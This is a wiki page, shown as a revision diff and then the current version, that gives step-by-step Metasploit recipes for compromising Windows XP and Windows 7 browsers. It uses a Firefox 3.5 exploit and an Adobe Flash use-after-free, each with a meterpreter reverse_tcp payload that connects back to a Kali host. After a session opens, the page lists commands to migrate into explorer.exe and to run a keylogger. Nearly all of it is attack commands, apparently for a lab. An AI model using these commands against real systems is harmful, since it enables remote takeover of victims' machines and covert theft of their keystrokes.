Metasploit browser Exlpoit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→Action) |
|||
| (6 dazwischenliegende Versionen von einem anderen Benutzer werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| − | =Setup | + | =Setup target= |
Winxp Service pack 3 | Winxp Service pack 3 | ||
Firefox 3.5 | Firefox 3.5 | ||
| Zeile 8: | Zeile 8: | ||
=Action= | =Action= | ||
| − | + | start metasploit | |
msfconsole | msfconsole | ||
| Zeile 20: | Zeile 20: | ||
exploit | exploit | ||
| − | jetzt muss das opfer mit dem | + | jetzt muss das opfer mit dem firefox diese url aufrufen http://192.168.242.53:8888/hack |
wenn wir meterpreter > sehen hat der exploit funktioniert | wenn wir meterpreter > sehen hat der exploit funktioniert | ||
| Zeile 36: | Zeile 36: | ||
| − | * Setup | + | * Setup target |
win732 bit | win732 bit | ||
| Zeile 52: | Zeile 52: | ||
===on the console=== | ===on the console=== | ||
| − | metasploit | + | start metasploit console |
*msfconsole | *msfconsole | ||
| − | + | Selection of the exploits | |
*use exploit/windows/browser/adobe_flash_domain_memory_uaf | *use exploit/windows/browser/adobe_flash_domain_memory_uaf | ||
| − | + | selection of malicious software | |
*set payload windows/meterpreter/reverse_tcp | *set payload windows/meterpreter/reverse_tcp | ||
| − | + | put the localhost | |
*set lhost 192.168.244.50 | *set lhost 192.168.244.50 | ||
| − | + | putting the web server | |
*set srvhost 192.168.244.50 | *set srvhost 192.168.244.50 | ||
| − | + | path to the hack | |
*set uripath /hack | *set uripath /hack | ||
| − | + | execute the exploits | |
*exploit | *exploit | ||
=on the target= | =on the target= | ||
| − | * | + | *go up with win7 to http://192.168.244.150:8080/hack |
=on the hackersystem= | =on the hackersystem= | ||
| Zeile 83: | Zeile 83: | ||
==method== | ==method== | ||
| − | session | + | enter session |
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1 | *msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1 | ||
ps listing | ps listing | ||
*meterpreter > ps | *meterpreter > ps | ||
Aktuelle Version vom 14. Oktober 2020, 14:21 Uhr
Setup target
Winxp Service pack 3 Firefox 3.5
Setup Hacker
Kali Linux ip: 192.168.242.53
Action
start metasploit
msfconsole
use exploit/multi/browser/firefox_escape_retval set payload windows/meterpreter/reverse_tcp set lhost 192.168.242.53 (lokaler Host) set svrhost 192.168.242.53 (HTTP-Server IP) set svrport 8888 (HTTP-Server Port) set lport 4444 (lokaler Port) set uripath /hack (optional) exploit
jetzt muss das opfer mit dem firefox diese url aufrufen http://192.168.242.53:8888/hack wenn wir meterpreter > sehen hat der exploit funktioniert
session - i 1 (in die session gehen) sessions -h (zeigt optionen) ps (zeigt prozesse) migrate PSID (verschiebt in den prozess Z.b explorer.exe) getpid (zeigt momentanen prozess) keyscan_start (startet den keyloger) keyscan_dump (zeigt aufzeichnungen) keyscan_stop (stopt keyloger)
Win7 32bit Exploit
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html
- Setup target
win732 bit
adobeflash 17.0.0.134
firefox
TeamViewer ID 597 708 786
Hackersystem
kali linux
ip 192.168.244.50
on the console
start metasploit console
- msfconsole
Selection of the exploits
- use exploit/windows/browser/adobe_flash_domain_memory_uaf
selection of malicious software
- set payload windows/meterpreter/reverse_tcp
put the localhost
- set lhost 192.168.244.50
putting the web server
- set srvhost 192.168.244.50
path to the hack
- set uripath /hack
execute the exploits
- exploit
on the target
- go up with win7 to http://192.168.244.150:8080/hack
on the hackersystem
commandos
sessions -l (listet die sessions) sessions -i 1 (in die session gehen) sessions -h (zeigt optionen) ps (zeigt prozesse) migrate PSID (verschiebt in den prozess Z.b explorer.exe) getpid (zeigt momentanen prozess) keyscan_start (startet den keyloger) keyscan_dump (zeigt aufzeichnungen) keyscan_stop (stopt keyloger)
method
enter session
- msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
- meterpreter > ps